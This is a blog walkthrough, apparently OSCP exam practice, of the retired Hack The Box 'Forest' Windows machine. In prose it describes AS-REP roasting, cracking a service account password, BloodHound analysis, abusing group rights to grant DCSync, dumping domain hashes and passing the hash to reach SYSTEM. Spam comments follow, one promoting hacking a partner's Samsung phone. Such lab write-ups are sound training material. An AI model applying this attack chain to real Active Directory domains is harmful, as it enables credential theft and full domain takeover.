OSCP PREPROTİONS – HTB Forest

The Forest machine is a deliberately vulnerable machine with a Windows operating system, which is among the retired machines. It is expected to obtain user and root flags by using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
ClassicScan

Full Port Scan

As a result of the port scan, we came across quite a few ports.

  • Since 88 kerberos and 389 ldap ports are open, we understand that it is most likely a Windows Active directory machine.
  • Domain information is htb.loca and hostname (FQDN) information is FOREST.htb.local.
  • It has Windows Server 2016 Standard 14393 operating system.
  • We will need to provide anonymous LDAP and SMB enumeration
  • If we find the Credential information from LDAP or SMB, I can use winrm wsman ports.
    As a result of the Nmap scan, we collected this information on the system.
    We provide Ldap enumeration;

ldapServiceName: htb.local:forest$@HTB.LOCAL

Filter users

Here we have identified users
Let’s provide smb enumeration with enum4linux tool

The user svc-alfresco is noteworthy here because we did not see this user when we looked with ldapsearch and it is also noteworthy that it is “Service Accounts”
We checked the sharing areas with Smbclinet and found no results

We see that anonymous login is successful but no shares are listed.
Let’s try an asep-roasting attack here using the GetNPUsers.py tool, where we can get the TGT ticket, then break the hash and get the password.
Here we created userlist.txt with nano and then queried using the tool

We saved this TGT as a hash and then we broke it with john.

This is how we got the password
svc-alfresco:s3rvice
Let’s connect to evilwinrm using this credential

We have successfully connected and got our user flag, but we still cannot access the root flag, so we provide local enumeration.

Install and run Winpeas

Let’s use bloodhound without success with winpeas output
First I install and run sharphound on the target machine
After the process is complete, it gives us a zip file.
We forward this zip file to our local machine to examine it with bloundhound

I export the resulting zip file to the blound hound file
I right click on the user SVC-ALFRESCO and mark it as “User as Owned”.
In the Analaysisi section I click on “Shortest Path from Owned Principals”

and I interpret the resulting graph

We can see that the user svc-alfresco is a member of the Service Accounts group which is a member of the Privileged IT Accounts group which is a member of Account Operators. Also the Account Operators group has GenericAll permissions in the Exchange Windows Permissions group which has WriteDacl permissions in the domain domain.

svc-alfresco is not only a member of Service Accounts, it is also a member of the Privileged IT Accounts and Account Operators groups.
The Service Accounts group grants the user limited account creation privileges. Therefore, the user svc-alfresco can create other users in the domain.
The Service Accounts group has the GenericAll permission in the Exchange Windows Permission group. This permission essentially gives members full control over the group and therefore allows members to change group membership directly. svc-alfresco is a member of Service Accounts, so it can change the permissions of the Exchange Windows Permission group.
The Exchange Windows Permission group has the WriteDacl permission on the HTB.LOCAL domain. This permission allows members to modify the DACL (Discretionary Access Control List) in the domain. We will abuse this to grant ourselves DcSync privileges, which will give us the right to perform domain replication and discard all password hashes from the domain.
Putting all the pieces together, our attack path is as follows.

  1. Create a user in the domain. This is possible because svc-alfresco is a member of the Service Accounts group.
  2. Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions in the Exchange Windows Permission group.
  3. Grant the user DcSync privileges. This is possible because the user is part of the Exchange Windows Permissions group, which has WriteDacl permission on the htb.local domain.
  4. Perform a DcSync attack and dump the password hashes of all users in the domain.
  5. Perform a Pass the Hash attack to gain access to the administrator’s account.

We create a user named Ma

I include user Ma in the Exchange Windows Permissions group

Let’s see that the user is in the group

Then this user became the consistency we wanted
Grant DCSync privileges to the user. We will use PowerView for this. First, we upload Powerview with the upload command.

We activate the powerview file

Then we activate dssync

After activating it here, we get the hash information from the machine using the secretdump tool

We have obtained the hash information of the Administrator user, we will perform paas the hash attack using this hash with the psexec tool tool.

We have obtained a shell on the nt authority\system user so we can read the root flagi

Comments

  1. sklep internetowy

    Hello! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results.

    If you know of any please share. Thanks! You can read similar
    text here: Dobry sklep

  2. Rastrear Teléfono Celular

    Cuando olvide la contraseña para bloquear la pantalla, si no ingresa la contraseña correcta, será difícil desbloquear y obtener acceso. Si descubre que su novio / novia sospecha, es posible que haya pensado en piratear su teléfono Samsung para obtener más pruebas. Aquí, le proporcionaremos la mejor solución sobre cómo descifrar la contraseña de un teléfono móvil Samsung.

  3. Scrapebox List

    Hello! Do you know if they make any plugins to help
    with Search Engine Optimization? I’m trying to get my site to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Kudos! You can read similar
    text here: Auto Approve List

  4. Lottery Defeater

    What’s Happening i’m new to this, I stumbled upon this I’ve found It positively useful and it has aided me out loads. I hope to contribute & help other users like its helped me. Good job.

  5. Aizen power reviews

    of course like your website however you have to check the spelling on several of your posts. Many of them are rife with spelling issues and I in finding it very bothersome to inform the reality then again I’ll surely come again again.

  6. Puravive

    I’ve been browsing on-line more than 3 hours these days, but I never discovered any fascinating article like yours. It’s beautiful worth sufficient for me. Personally, if all site owners and bloggers made excellent content as you probably did, the net can be much more helpful than ever before. “Learn to see in another’s calamity the ills which you should avoid.” by Publilius Syrus.

  7. uWeed Schweiz

    Hey there! I know this is kinda off topic nevertheless I’d figured I’d ask. Would you be interested in exchanging links or maybe guest authoring a blog article or vice-versa? My blog addresses a lot of the same topics as yours and I believe we could greatly benefit from each other. If you are interested feel free to shoot me an email. I look forward to hearing from you! Terrific blog by the way!

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir